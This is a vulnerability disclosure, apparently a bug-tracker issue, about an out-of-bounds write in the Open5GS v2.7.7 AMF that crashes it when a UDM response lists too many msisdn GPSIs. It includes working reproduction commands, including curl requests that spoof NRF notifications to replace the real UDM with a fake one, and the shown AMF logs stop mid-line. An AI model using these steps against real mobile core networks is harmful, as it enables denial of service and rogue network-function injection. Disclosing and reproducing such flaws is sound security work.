| 描述 | ### Open5GS Release, Revision, or Tag
v2.7.7
### Description
AMF crashes during a real UE registration flow when the `Nudm_SDM` `am-data`
response contains too many `gpsis` entries of type `msisdn-*`.
This path is UE-driven: the crash is only reached after an external UE starts a
normal 5G registration procedure and AMF issues:
```text
GET /nudm-sdm/v2/{supi}/am-data
```
inside `amf_nudm_sdm_handle_provisioned()`.
The root cause is a fixed-size array overflow in the AMF-side UDM response
parser:
```c
if (gpsiList) {
OpenAPI_list_for_each(gpsiList, node) {
...
if (strncmp(gpsi, OGS_ID_GPSI_TYPE_MSISDN,
strlen(OGS_ID_GPSI_TYPE_MSISDN)) == 0) {
amf_ue->msisdn[amf_ue->num_of_msisdn] =
ogs_id_get_value(node->data);
ogs_assert(amf_ue->msisdn[amf_ue->num_of_msisdn]);
amf_ue->num_of_msisdn++;
}
}
}
```
at `../src/amf/nudm-handler.c:55-69`.
The destination array only has capacity `OGS_MAX_NUM_OF_MSISDN == 2`:
```c
#define OGS_MAX_NUM_OF_MSISDN 2
```
at `../lib/proto/types.h:876-880`.
There is no bounds check before incrementing `amf_ue->num_of_msisdn`, so an
oversized `gpsis` list corrupts adjacent AMF UE state during registration. In
the confirmed run, the corruption manifested immediately afterwards as bogus
PLMN values in `No Allowed-NSSAI` diagnostics, followed by an AMF segmentation
fault.
This is not a duplicate of the existing AMF reports under `report/amf/`: it is
a different entry chain, different trust boundary, and different root-cause
site from the already documented `namf-comm`, `namf-callback`, and `nnrf-*`
issues.
### Root cause
- Entry chain:
external UE registration
-> AMF `PUT /nudm-uecm/.../amf-3gpp-access`
-> AMF `GET /nudm-sdm/v2/{supi}/am-data`
-> `amf_nudm_sdm_handle_provisioned()`
- Root-cause site:
`../src/amf/nudm-handler.c:55-69`
- Fixed target:
`../lib/proto/types.h:876-880`
- Root cause family:
fixed-size array overflow / out-of-bounds write
- Controlling field:
`AccessAndMobilitySubscriptionData.gpsis`
### Steps to Reproduce
1. Start the Open5GS Docker lab and ensure these containers are running:
```bash
docker start db ausf udm udr pcf smf upf amf nssf
```
2. Confirm the subscriber exists in MongoDB. In my live run, the existing test
subscriber was:
```text
IMSI: 001011234567891
```
3. Start a real gNB and UE with the bundled UERANSIM configs:
```bash
docker run --rm -d --name amf-audit-gnb --network open5gs \
--network-alias gnb.ueransim.org \
-v /home/ubuntu/docker-open5gs/configs/internal/ueransim/gnb.yaml:/ueransim/config/gnb.yaml:ro \
free5gc/ueransim:latest /ueransim/nr-gnb -c /ueransim/config/gnb.yaml
docker run --rm -d --name amf-audit-ue --network open5gs \
--network-alias ue.ueransim.org \
--cap-add NET_ADMIN --device /dev/net/tun:/dev/net/tun \
-v /home/ubuntu/docker-open5gs/configs/internal/ueransim/ue.yaml:/ueransim/config/ue.yaml:ro \
free5gc/ueransim:latest /ueransim/nr-ue -c /ueransim/config/ue.yaml -r
```
4. Start the fake UDM helper on the host:
```bash
node /home/ubuntu/open5gs_277/.audit_tmp/amf_fake_udm.js
```
5. Replace the real UDM in AMF's local cache with the fake UDM:
```bash
AMF_IP=$(docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' amf)
curl --http2-prior-knowledge -sS -i -m 8 \
-X POST "http://$AMF_IP/nnrf-nfm/v1/nf-status-notify" \
-H 'content-type: application/json' \
--data '{"event":"NF_DEREGISTERED","nfInstanceUri":"http://nrf.open5gs.org/nnrf-nfm/v1/nf-instances/4568f3be-3644-41f1-bff0-3b335fd843b5"}'
curl --http2-prior-knowledge -sS -i -m 8 \
-X POST "http://$AMF_IP/nnrf-nfm/v1/nf-status-notify" \
-H 'content-type: application/json' \
--data '{"event":"NF_REGISTERED","nfInstanceUri":"http://10.33.33.1:18083/nnrf-nfm/v1/nf-instances/fake-udm-amf","nfProfile":{"nfInstanceId":"fake-udm-amf","nfType":"UDM","nfStatus":"REGISTERED","fqdn":"fake-udm-amf.local","ipv4Addresses":["10.33.33.1"],"allowedNfTypes":["SCP","AMF","SMF","AUSF"],"priority":0,"capacity":100,"load":0,"nfServices":[{"serviceInstanceId":"fake-udm-ueau","serviceName":"nudm-ueau","versions":[{"apiVersionInUri":"v1","apiFullVersion":"1.0.0"}],"scheme":"http","nfServiceStatus":"REGISTERED","ipEndPoints":[{"ipv4Address":"10.33.33.1","port":18083}],"allowedNfTypes":["AUSF"],"priority":0,"capacity":100,"load":0},{"serviceInstanceId":"fake-udm-uecm","serviceName":"nudm-uecm","versions":[{"apiVersionInUri":"v1","apiFullVersion":"1.0.0"}],"scheme":"http","nfServiceStatus":"REGISTERED","ipEndPoints":[{"ipv4Address":"10.33.33.1","port":18083}],"allowedNfTypes":["AMF","SMF"],"priority":0,"capacity":100,"load":0},{"serviceInstanceId":"fake-udm-sdm","serviceName":"nudm-sdm","versions":[{"apiVersionInUri":"v2","apiFullVersion":"2.0.0"}],"scheme":"http","nfServiceStatus":"REGISTERED","ipEndPoints":[{"ipv4Address":"10.33.33.1","port":18083}],"allowedNfTypes":["AMF","SMF"],"priority":0,"capacity":100,"load":0}]}}'
```
6. Control experiment: configure the fake UDM for a single normal `gpsi`, then
restart the UE and wait for successful registration:
```bash
printf 'control\n' > /home/ubuntu/open5gs_277/.audit_tmp/amf_fake_udm.mode
docker restart amf-audit-ue
docker logs --tail 60 amf-audit-ue
docker inspect -f '{{.State.Status}} {{.State.ExitCode}}' amf
```
In my live run, the fake UDM received the full UDM sequence and the UE reached
successful registration plus PDU session establishment.
7. Malicious experiment: change only the fake UDM mode so `am-data` returns
`16` `msisdn-*` `gpsis`, then restart the UE again:
```bash
printf 'am-data-gpsi-overflow\n' > /home/ubuntu/open5gs_277/.audit_tmp/amf_fake_udm.mode
docker restart amf-audit-ue
docker inspect -f '{{.State.Status}} {{.State.ExitCode}} {{.State.FinishedAt}}' amf
docker logs --tail 120 amf
```
### Logs
Control UE result:
```text
Initial Registration is successful
PDU Session establishment is successful PSI[1]
```
Control AMF state:
```text
running 0
```
Container state after the malicious response:
```text
exited 139 2026-04-12T14:58:46.341705986Z
```
AMF logs:
```text
04/12 14:58:28.440: [sbi] INFO: Setup NF EndPoint(fqdn) [udm.open5gs.org:0] (../lib/sbi/context.c:2111)
04/12 14:58:28.440: [sbi] INFO: Setup NF EndPoint(addr) [10.33.33.14:80] (../lib/sbi/context.c:2111)
04/12 14:58:45.677: [sbi] INFO: [28259240-367f-41f1-862a-81de7e8f7ca7] (NRF-notify) NF_DEREGISTERED event [type:UDM] (../lib/sbi/nnrf-handler.c:1186)
04/12 14:58:45.694: [sbi] INFO: [fake-udm-amf] (NRF-notify) NF registered (../lib/sbi/nnrf-handler.c:1154)
04/12 14:58:45.694: [sbi] INFO: [fake-udm-amf] (NRF-notify) NF Profile updated [type:UDM] (../lib/sbi/nnrf-handler.c:1168)
04/12 14:58:45.694: [sbi] INFO: [UDM] NFInstance associated [fake-udm-amf] (../lib/sbi/context.c:2441)
04/12 14:58:45.694: [sbi] INFO: Setup NF EndPoint(fqdn) [fake-udm-amf.local:0] (../lib/sbi/context.c:2446)
04/12 14:58:45.694: [sbi] INFO: Setup NF EndPoint(addr) [10.33.33.13:80] (../lib/sbi/context.c:2446)
04/12 14:58:45.694: [sbi] INFO: [nudm-ueau] NFService associated [fake-udm-ueau] (../lib/sbi/context.c:2109)
04/12 14:58:45.694: [sbi] INFO: Setup NF EndPoint(addr) [10.33.33.13:18083] (../lib/sbi/context.c:2111)
04/12 14:58:45.694: [sbi] INFO: [nudm-uecm] NFService associated [fake-udm-uecm] (../lib/sbi/context.c:2109)
04/12 14:58:45.694: [sbi] INFO: Setup NF EndPoint(addr) [10.33.33.13:18083] (../lib/sbi/context.c:2111)
04/12 14:58:45.694: [sbi] INFO: [nudm-sdm] NFService associated [fake-udm-sdm] (../lib/sbi/context.c:2109)
04/12 14:58:45.694: [sbi] INFO: Setup NF EndPoint(addr) [10.33.33.13:18083] (../lib/sbi/context.c:2111)
04/12 14:58:45.929: [amf] INFO: gNB-N2 accepted[10.33.33.8]:60213 in ng-path module (../src/amf/ngap-sctp.c:113)
04/12 14:58:45.929: [amf] INFO: gNB-N2 accepted[10.33.33.8] in master_sm module (../src/amf/amf-sm.c:953)
04/12 14:58:45.939: [amf] INFO: [Added] Number of gNBs is now 1 (../src/amf/context.c:1277)
04/12 14:58:45.939: [amf] INFO: gNB-N2[10.33.33.8] max_num_of_ostreams : 10 (../src/amf/amf-sm.c:1000)
04/12 14:58:46.161: [amf] INFO: InitialUEMessage (../src/amf/ngap-handler.c:461)
04/12 14:58:46.161: [amf] INFO: [Added] Number of gNB-UEs is now 1 (../src/amf/context.c:2777)
04/12 14:58:46.161: [amf] INFO: RAN_UE_NGAP_ID[1] AMF_UE_NGAP_ID[1] TAC[1] CellID[0x10] (../src/amf/ngap-handler.c:622)
04/12 14:58:46.161: [amf] INFO: [suci-0-001-01-0000-0-0-1234567891] Unknown UE by SUCI (../src/amf/context.c:1912)
04/12 14:58:46.161: [amf] INFO: [Added] Number of AMF-UEs is now 1 (../src/amf/context.c:1688)
04/12 14:58:46.161: [gmm] INFO: Registration request (../src/amf/gmm-sm.c:1670)
04/12 14:58:46.161: [gmm] INFO: [suci-0-001-01-0000-0-0-1234567891] SUCI (../src/amf/gmm-handler.c:183)
04/12 14:58:46.161: [sbi] INFO: [454c6e9c-3644-41f1-a93f-e1505117bc41] Setup NF Instance [type:AUSF] (../lib/sbi/path.c:307)
04/12 14:58:46.167: [amf] INFO: Setup NF EndPoint(fqdn) [ausf.open5gs.org:0] (../src/amf/nausf-handler.c:130)
04/12 14:58:46.167: [amf] INFO: Setup NF EndPoint(addr) [10.33.33.4:80] (../src/amf/nausf-handler.c:130)
04/12 14:58:46.171: [sbi] INFO: [fake-udm-amf] Setup NF Instance [type:UDM] (../lib/sbi/path.c:307)
04/12 14:58:46.173: [sbi] INFO: [fake-udm-amf] Setup NF Instance [type:UDM] (../lib/sbi/path.c:307)
04/12 14:58:46.175: [amf] ERROR: No Allowed-NSSAI (../src/amf/context.c:3044)
04/12 14:58:46.175: [amf] ERROR: Number of Subscribed S-NSSAI [1] (../src/amf/context.c:3045)
04/12 14:58:46.175: [amf] ERROR: Default S_NSSAI[SST:1 SD:0x1] (../src/amf/context.c:3050)
04/12 14:58:46.175: [amf] ERROR: Number of Requested NSSAI [1] (../src/amf/context.c:3059)
04/12 14:58:46.175: [amf] ERROR: PLMN_ID[MCC:12 MNC:645] (../src/amf/context.c:306 |
|---|